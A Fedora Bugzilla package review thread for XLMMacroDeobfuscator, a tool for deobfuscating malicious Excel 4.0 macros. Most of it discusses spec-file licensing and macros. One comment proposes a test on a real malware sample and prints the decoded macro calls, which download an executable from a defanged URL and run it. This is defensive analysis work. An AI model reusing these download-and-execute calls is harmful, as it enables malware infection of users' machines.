https://bugzilla.redhat.com/show_bug.cgi?id=2245786
Bug ID: 2245786
Summary: Review Request: python-xlmmacrodeobfuscator - XLM Emulation engine to deobfuscate malicious XLM macros, also known as Excel 4
Product: Fedora
Version: rawhide
Status: NEW
Component: Package Review
Assignee: nobody@fedoraproject.org
Reporter: rebus@seznam.cz
QA Contact: extras-qa@fedoraproject.org
CC: package-review@lists.fedoraproject.org
Target Milestone: ---
Classification: Fedora
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src....
Description:
XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully performing the code. It supports xls, xlsm, and xlsb formats. It uses xlrd2, pyxlsb2 and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.
Fedora Account System Username: rebus
--- Comment #1 from Michal Ambroz rebus@seznam.cz ---
This package built on koji: https://koji.fedoraproject.org/koji/taskinfo?taskID=108021352
Aaron Rainbolt arraybolt3@gmail.com changed:
What |Removed |Added
Whiteboard| |NotReady
Doc Type|--- |If docs needed, set a value
CC| |arraybolt3@gmail.com
--- Comment #2 from Aaron Rainbolt arraybolt3@gmail.com ---
Unofficial and incomplete initial review of the spec file:
License: Apache License 2.0
This needs to use an SPDX identifier. See https://docs.fedoraproject.org/en-US/legal/license-field/
Also, more often than not, a program isn't really under just one license, but oftentimes includes code from other projects under various other licenses. Any files that ultimately end up in the binary RPM in one form or another need to have their licenses listed here.
%{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}
Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines (https://docs.fedoraproject.org/en-US/packaging-guidelines/Python_201x/), and those guidelines are now old and deprecated at this point, so %python_provide is like **really** deprecated now. See https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_provides_... for how to use %py_provides.
BuildRequires: python%{python3_pkgversion}-devel
I think you need to spell out "python3-devel" here rather than using the macro. "Every package that uses Python (at runtime and/or build time) and/or installs Python modules MUST explicitly include BuildRequires: python3-devel in its .spec file, even if Python is not actually invoked during build time." (From https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_distro_wi...)
Fedora Review Service fedora-review-bot@fedoraproject.org changed:
What |Removed |Added
URL| |https://github.com/DissectMalware/XLMMacroDeobfuscator
--- Comment #3 from Fedora Review Service fedora-review-bot@fedoraproject.org ---
Copr build: https://copr.fedorainfracloud.org/coprs/build/6563210 (succeeded)
Review template: https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-rev...
Please take a look if any issues were found.
--- This comment was created by the fedora-review-service https://github.com/FrostyX/fedora-review-service
If you want to trigger a new Copr build, add a comment containing new Spec and SRPM URLs or [fedora-review-service-build] string.
--- Comment #4 from Michal Ambroz rebus@seznam.cz ---
License: Apache License 2.0
Changed from the long name to the short SPDX identifier.
%{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}
BuildRequires: python%{python3_pkgversion}-devel
I think you need to spell out "python3-devel" here rather than using the
I am planning to support EPEL from RHEL 7; on RHEL this macro translates the package name to python36-something instead of just python3-something. I noticed a bigger problem ... I was actually missing the camelcasing, which was the reason for explicitly adding that.
Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines
Again something for the EPEL package ... there is only python_provide on EPEL. Let's make a condition for that to be clear.
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src....
--- Comment #5 from Fedora Review Service fedora-review-bot@fedoraproject.org ---
Copr build: https://copr.fedorainfracloud.org/coprs/build/6567936 (succeeded)
Review template: https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-rev...
Please take a look if any issues were found.
--- This comment was created by the fedora-review-service https://github.com/FrostyX/fedora-review-service
If you want to trigger a new Copr build, add a comment containing new Spec and SRPM URLs or [fedora-review-service-build] string.
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added
Depends On| |2246454
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2246454 [Bug 2246454] Review Request: python-pyxlsb2 - Excel 2007+ Binary Workbook (xlsb) parser
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added
Depends On| |2246704
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2246704 [Bug 2246704] Review Request: python-xlrd2 - Library to extract data from Microsoft Excel legacy spreadsheet files (xls)
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added
Blocks| |1974565
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=1974565 [Bug 1974565] python-oletools-0.60.1 is available
--- Comment #6 from Michal Ambroz rebus@seznam.cz ---
As this is a really specific tool, I proposed a test case to test that the tool does what it is supposed to do. (BEWARE!!!) It is using real malware for the test, so handle with care. Download of the second stage is not active now, but I am still de-fanging the malicious URL in the example below.
Test1 is based on Didier Stevens' diary https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110
1) download the malware sample from Malshare (need to register)
   https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb412...
   https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe0...
2) (OPTIONAL) check that it really contains the obfuscated code in the worksheet cells (using the DidierStevensSuite). This step is optional as this particular sample IS obfuscated and was already publicly analyzed.
   $ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | xmldump.py celltext | grep -e CALL
   BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0
   BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0
3) check that xlmdeobfuscator really gives the deobfuscated value
   $ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL
   CELL:BC1986 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\...)
   CELL:BC1987 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)
Michal Ambroz rebus@seznam.cz changed:
What |Removed |Added
Depends On| |2250689
Referenced Bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=2250689 [Bug 2250689] Review Request: python-untangle - Converts XML to Python objects
Bug 2245786 depends on bug 2250689, which changed state.
Bug 2250689 Summary: Review Request: python-untangle - Converts XML to Python objects https://bugzilla.redhat.com/show_bug.cgi?id=2250689
What |Removed |Added
Status|ON_QA |CLOSED
Resolution|--- |ERRATA